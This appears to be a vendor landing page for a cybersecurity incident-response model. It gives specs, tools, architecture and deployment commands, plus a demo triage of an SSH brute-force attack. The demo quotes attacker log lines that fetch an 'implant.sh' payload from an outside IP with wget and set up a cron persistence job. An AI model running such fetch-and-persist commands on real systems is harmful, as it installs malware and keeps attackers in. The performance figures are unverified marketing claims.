CyberAgent MoE · 9B · Top-2 routing

The first autonomous
cybersecurity model with
real-time incident response.

Trained on 40B+ tokens of CVE data, MITRE ATT&CK, threat intel, SIEM documentation, and incident response playbooks. Ships with 14 built-in security tools — enrich, correlate, contain, and document incidents autonomously, evidence preserved, human-in-the-loop on destructive actions.

Try CyberAgent → See architecture

2.6B active params · 8 experts 32K context 14 agent tools 294 MITRE techniques · 100% air-gap ready

cyberagent · autonomous triage · 23s total MoE routing: TI → IR → Net

Alert: "Brute force login attempts from 185.220.101.47 against SSH on 3 production servers. 847 attempts in 10 minutes." Step 1 · Intelligence enrichment (312ms) ▸ lookup_ip(185.220.101.47) asn=AS204778 org="Tor Exit Node" threat_score=98 greynoise=malicious · last_seen=4h (EU financial campaign) Step 2 · SIEM correlation (1.1s) ▸ query_siem(src_ip=185.220.101.47, index=auth_logs, last=24h) 847 failed SSH · 3 hosts 2 SUCCESSFUL authentications on server-prod-07 (user=deploy) at 03:51:42 UTC → escalating severity: HIGH → CRITICAL Step 3 · Post-compromise activity (480ms) ▸ get_user_activity(deploy @ server-prod-07) 03:51:52 wget http://185.220.101.47/implant.sh 03:52:01 cron: */5 * * * * /tmp/.sys_update Step 4 · Malware identification (210ms) ▸ check_hash(a3f9c2e…) → Mirai variant · VT 72/90 Step 5 · Containment (human-approved · 1.0s) ▸ block_ip ✓ blocked at perimeter + WAF ▸ disable_account ✓ 4 active sessions terminated Step 6 · Incident report ▸ create_incident(INC-2026-1847) MITRE: T1110.001 T1059.004 T1053.003 T1071.001 ✓ Total autonomous triage time: 23 seconds Human review required for: malware removal, forensic image, deploy key rotation

40B+

training tokens · curated security corpora

built-in agent tools

294

MITRE ATT&CK techniques covered

<30s

avg autonomous triage time

Capabilities

Ten domains. One model.

Expert routing sends each query to the right slice of the MoE — threat intelligence, vulnerability analysis, incident response, compliance reasoning, and more — all within 2.6B active parameters.

Threat detection

Analyze logs, network flows, and behavioral signals. Maps every finding to MITRE ATT&CK tactics and techniques.

T1059T1027

Autonomous incident response

Enrich, correlate, contain, and document — end-to-end. Human approval gates on destructive actions.

14 tools

Vulnerability assessment

CVE details in context. CVSS vectors, exploit-in-wild status, compatible patches, and prioritized remediation.

CVE / NVDKEV

Code security review

OWASP Top 10 and CWE-mapped findings with fix-ready diffs. Works on Python, JS/TS, Go, Java, Rust, C/C++.

OWASPCWE

SIEM query generation

Splunk SPL, Elastic KQL, Sentinel KQL, and Lucene — native query syntax, not pseudocode.

SplunkElasticSentinel

Compliance auditing

SOC 2, ISO 27001:2022, NIST CSF 2.0, PCI-DSS v4.0, CIS Controls v8, HIPAA. Audit-ready gap analyses.

SOC 2ISO 27001PCI-DSS

Network security

Analyze packet captures, firewall rules, network anomalies, and DNS telemetry. NetFlow/IPFIX correlation.

NetFlowDNS

Digital forensics

Timeline reconstruction, artifact analysis, memory forensics guidance, and chain-of-custody documentation.

timelineartifacts

Pentest assistance

Test plans, payloads, and post-engagement reporting — only in authorized scope, refuses without scope declaration.

scope-gated

Built-in agent tools

14 tools. Native function calling.

Every CyberAgent deployment ships with a pluggable tool layer. Destructive tools are gated behind policy-based human approval.

query_siemSPL/KQL/Lucene queries against your SIEM index.

lookup_ipAbuseIPDB, VirusTotal, Shodan, GreyNoise.

lookup_domainWHOIS, DNS history, domain reputation.

check_cveFull CVE context — CVSS, KEV, exploits in the wild.

scan_portTCP/UDP — authorized systems only.

analyze_logParse logs for IOCs and anomalies.

block_ipPerimeter firewall / WAF block · human-approval.

disable_accountAD / IdP · terminates active sessions · human-approval.

create_incidentOpens ticket in ITSM — Jira, ServiceNow, Linear.

run_yaraExecute YARA rules against file or memory.

check_hashFile hash reputation — VT, MalwareBazaar, HybridAnalysis.

query_networkNetFlow / IPFIX lookups by IP, port, time.

get_user_activityUser session and activity logs for forensics.

send_alertSlack / PagerDuty / Teams — severity-aware.

Architecture

Sparse MoE optimized for security workloads.

32 transformer layers, GQA attention (16 heads, 4 KV), and an 8-expert MoE with top-2 routing. Experts specialize during training across threat intel, vulnerability analysis, IR playbooks, code review, compliance, and tool orchestration.

Input

embed · 2048 dim

SIEM alerts
Log lines
CVE IDs
Network flows
User activity

Attention

GQA · 16h / 4kv

× 32 layers
32K context
RoPE positional
FlashAttn-2

MoE layer

8 experts · top-2

Threat intel + IOC
CVE / CVSS
IR playbooks
Code + OWASP
Compliance
Net & forensics
Malware classify
Tool orchestration

Tool router

14 functions

Function calling
Parallel invocation
Approval gates
Audit log
Chain-of-custody

SOC 2 · 64 controls ISO 27001:2022 · 93 controls NIST CSF 2.0 PCI-DSS v4.0 CIS Controls v8 HIPAA

Deploy anywhere

Your data never leaves your perimeter.

Run on your own GPUs or air-gapped — threat-intel lookups route through on-premise feeds.

vLLM

Production inference. Tensor-parallel, Hermes tool-call parser.

vllm serve \
  thinkingdbx/cyberagent-moe-9b \
  --dtype bfloat16 \
  --max-model-len 32768 \
  --tool-call-parser hermes

Ollama

Single-command local run for dev machines and edge.

ollama pull \
  thinkingdbx/cyberagent-moe-9b
ollama run \
  thinkingdbx/cyberagent-moe-9b

HuggingFace

Transformers + bf16. Full tool schema via chat template.

AutoModelForCausalLM
  .from_pretrained(
    "thinkingdbx/…",
    torch_dtype=bf16,
    device_map="auto")

Docker · air-gap

High-security environments — local threat-intel DB, no egress.

docker run -p 8000:8000 \
  -e SIEM_ENDPOINT=… \
  -e TI_DATABASE=/data/ti.db \
  thinkingdbx/cyberagent